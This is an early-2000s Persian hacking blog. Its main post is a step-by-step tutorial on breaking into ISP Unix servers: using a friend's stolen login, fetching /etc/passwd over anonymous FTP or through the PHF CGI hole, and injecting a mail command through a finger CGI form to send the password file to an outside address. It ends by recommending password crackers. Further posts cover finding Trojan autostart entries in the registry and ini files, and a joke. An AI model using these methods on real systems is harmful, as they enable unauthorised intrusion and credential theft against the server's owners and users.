.:. .:. HACK BOYS .:. .:.

....::::اينجا رو باش :::....

اين جمله قصاری که ميخوانيد از بيانات يکی از دوستان وبلاگ نويسه پس بخونيد و حال کنيد فقط جون مادرت فحش نده
دريای عشق ساحل ندارد کره خر پارو بزن
اینم از درس
--------------------------
Unixيكي از سرورهايي است كه در جهان بسيار از آن استفاده مي شود در ايران و در مشهد خودمان هم ISPهايي وجود دارند كه سرور آن ها Unixباشند .بنابر اين شما مي توانيد براي هك آن ها از اين راه ها استفاده كنيد شما در اين راه احتمالا با مشكلات زيادي برخورد خواهيد كرد .من راه كامل و بي عيبي را در اختيار شما نمي گذارم براي هكر شدن بايد تلاش بسياري كرد و اين اشاره اي است كه شما را به طرف راه درست هدايت مي كند .براي هك يونيكس از اين طريق عمل مي كنند كه با روش هايي كه ذكر خواهد شد فايل حاوي Passwordها و IDها را كه به نام Passwdمي باشد دريافت كنند .اين فايل يك فايل متني است كه در آن اطلاعات بصورت رمز در آمده .وقتي شكا يك فايل Passwdرا باز كنيد چنين نوشته هايي را
مي بينيد .كه بايد آن را از حالت رمز در آورد .

root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
Taha:3A62i9qr:1012:10:Mashhad


در اينجا مثلا Tahaنام IDو 3a62...كلمهي عبور اما به صورت رمز در آمده مي باشد .
شايد فايل به شكل زير هم باشد .اما اين فايل كار را غيرممكنمي سازد.در صورتي كه به شكل زير باشد يعني در آن علامت *به جاي كلمه ي به رمز آمده به آن ها Shadowedگفته مي شود .

root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
Taha:*:1012:10:mashhad BFH:/home/user/Taha:/usr/local/bin/tcsh

ما فعلا مي خواهيم اين فايل را دريافت كنيم .اولين قدم اين است كه آيدي در آن ISPبراي خود دست و پا كنيم .حالا اين آيدي مي تواند متعلق به دوستمان باشد و يا يك آشناي دور .پيدا كردن رمز دوست شما به سادگي ميسر است كه در نامه هاي قبلي توضيح داده شده .بعد از پيدا كردن رمز شما با آيدي دوستتان به شبكه Connectشويد .اين اتصال مي تواند يك اتصال به طريق Modem DialUp Connectionباشد .بعد از اتصال كامل وارد قسمت MS-DOS Promptشويد و فرمان زير را وارد كنيد

FTP http://www.domain.com/

كه Domainآدرس سرور ISPمي باشد سپس از شما خواسته مي شود تا آيدي خود را وارد كنيد كلمه ي Anonymousرا بزنيد .سپس وقتي درخواست كلمه عبور شد كليد Enterرا بزنيد .اگر وارد سيستم شديد موفق شده ايد در غير اين صورت جمله ي login failedدريافت مي شود .دوباره امتحان كنيد و اين بار در كادر Passwordآدرس Emailاي را وارد كنيد .اگر اين بار هم جواب نداد به جاي كلمه ي anonymousاز Userخود يعني دوستتان استفاده كنيد . احتمال دارد اين بار هم موفق نشويد .اين دفعه روش هاي فوق را براي دستور زير امتحان كنيد

FTP ftp.domain.com

اگر اين بار هم جوابي نگرفتيد با ISPتماس گرفته و سوال كنيد كه چگونه مي توانم از سرور FTPخود شما استفاده كنم چون وارد سيتمتان نمي شود اگر پرسيد براي چه مي خواهيد وارد شويد بگوييد مي خواهم از نرم افزار هاي آن استفاده كنم ولي مواظب باشيد كه نام خود را نگوييد .خلاصه تمام تلاش خود را براي فهميدن روش دستيابي به سيستم بكنيد اگر توانستيد وارد سيستم شويد به راحتي مي توانيد وارد شاخه ي مشخصي رفته و فايل Passwdها را بگيريد ولي احتمال دارد كه آن شاخه براي شما قفل شده باشد .براي كار با FTPبايد دستورات FTPرا ياد داشته باشيد .براي لسيت دستورات مي توانيد ?را تايپ كنيد .ابتدا به شاخه ي ETCبرويد مي توانيد فايل passwdرا در آنجا پيدا كنيد .اين فايل را بگيريد .اگر در آنجا نبود شاخه هاي ديگر را امتحان كنيد .ولي به احتمال زياد همانجاست .حال اگر اصلا نتوانستيد وارد FTPشويد مي توانيد اين فايل را با استفاده از قايلبيت PHFبگيريد .به اين صورت كه در Internet Browserخود آدرس زير را وارد كنيد .

http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd

اگر به اين صورت هم نتوانستيد آن را بگيريد مي توانيد از طريق Fingerاين كار را انجام دهيد .اين روش به شرطي جواب مي دهد كه Serverمورد نظر قابليت Fingerرا داشته باشد .به آدرس زير مراجعه كنيد .

www.domain.com/cgi-bin/finger

اگر اين آدرس كار نكند ديگر هيچ اميدي نيست اما اگر كار كند كادري جلوي شما ظاهر مي شود كه مي خواهد نام مورد نظر خود را بدهيد .آدرس زير را وارد كنيد .

ID@domain.com ; /bin/mail you@somewhere.com < etc/passwd

كه در اين آدرس IDشناسه كاربري يك شخص است كه مثلا مي توانيد از آيدي دوستتان استفاده كنيد domain.comآدرس نام حوزه ي ISPاست و آدرس you@somewhere.comآدرس Emailشماست مثلا اين يك نمونه است .

bfh@internet.com ; /bin/mail taha_bazri@yahoo.com < etc/passwd

با وارد كردن اين دستور فايل Passwdبراي من به آدرس Taha_bazri@yahoo.com
پست مي شود !

خوب حالا تا الان اگر توانسته ايد فايل را گرفته باشيد كه بهتر در غير اينصورت بايد بي خيال اين روش شويد .
حالا اگر فايل shadowedگير آورديد بقيه ي متن را نخوانيد چون كمكي به شما نمي كند و بايد از روش هاي ديگري استفاده كرد .اما اگر يك فايل مثل نمونهي اولي كه در بالا بود گير آورديد مي توانيد كار خود را ادامه دهيد حالا شما نياز به يك برنامه ي Unix Password Crackerداريد معروف ترين اين نوع برنامه ها John Ripperو Cracker Jackمي باشد .اما John Ripper سريعترين نوع اين برنامه مي باشد .اين دو برنامه را مي توانيد از همان آدرس قبلي يعني www.hackersclub.com/km/frontpageبه دست بياوريد اما نمونه ي ديگري از اين نمونه برنامه ها به كتابخانه هك به نام jill_v20 ارسال شد .با استفاده از اين برنامه ها مي توانيد به هدف خود برسيد
+ احسان شیطون ; ۸:۳٠ ‎ق.ظ ; دوشنبه ٢٩ اردیبهشت ،۱۳۸٢
comment نظرات ()

سلام

سلام با عرض شرمندگی برای اين مدتی که نبودم يه کم حالم بد بود و بيمارستان بودم ولی به اميد خدا خوب شدم و حالا در اختيار شما هستم با ارزوی سلامت برای همه شما .....
احسان
+ احسان شیطون ; ٤:٤۸ ‎ب.ظ ; سه‌شنبه ٢۳ اردیبهشت ،۱۳۸٢
comment نظرات ()

چگونه بدون Anti-Trojan مي شويم که بر روی سیستم Trojan نصب شده است

البته اين به آن معنا نيست که شما نياز به Anti-Trojan نداريد.ولي در اينجا سه روش که اکثر Trojan ها
برای اجرا شدن از آنها استفاده مي کنند را بيان مي کنيم.

1)Auto start folder :

شاخه ی Auto start شما در اينجا مشخص شده است:

min%\start menu\program\start% و هر فايل که در اين شاخه باشد

در هنگام بالا آمدن ويندوز اجرا خواهد شد .

2)Win.ini :

ابتدا اين فايل را باز کنيد و اگر اين کدها را در اين فايل پيدا کرديد:

[windows]

loud=Trojan

run=Trojan

nullport=none

nullport=none Base codepage=1256

ممکن است روی کامپيو تر شما Trojan نصب شده باشد حالا فايل های Trojanرا پيدا کرده و پاک کنيد .

3) : system.ini

مثل win.ini اين فايل را هم باز نماييد ( با notepad ) اگر شما اين را پيدا کرديد

shell=Explorer.EXE Trojan.EXE

Trojan بعد از اجرای Windows Explorer اجرا مي شود .

4) Registry:

درregistry روشهای زيادی برای اجرای اتوماتيک فايل ها وجود دارد که چند مورد

آن را بررسي مي کنيم .

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]

"Info"="c:\directory\Trojan.exe"



[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]

"Info"="c:\directory\Trojan.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]

"Info"="c:\directory\Trojan.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]

"Info="c:\directory\Trojan.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]

"Info"="c:\directory\Trojan.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]

"Info"="c:\directory\Trojan.exe"

- Registry Shell Open

[HKEY_CLASSES_ROOT\exefile\shell\open\command]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command]

کلیدی با مقدا “%1 %” در اینجا قرار دارد و اگر یک فایل اجرایی اینجا بود مثل Trojan.exe “%1 %” این نشون میده که اتوماتیک قابل اجرای دوباره میباشد.











منبع:/شبگرد
+ احسان شیطون ; ٧:٤٢ ‎ق.ظ ; دوشنبه ۱٥ اردیبهشت ،۱۳۸٢
comment نظرات ()

 

اينم يه کلک ساده برای خنديدن شما دوستان

می تو نید درایو های خودتونو ببینید



inam az drive D shoma




+ احسان شیطون ; ٦:٢۳ ‎ب.ظ ; دوشنبه ۸ اردیبهشت ،۱۳۸٢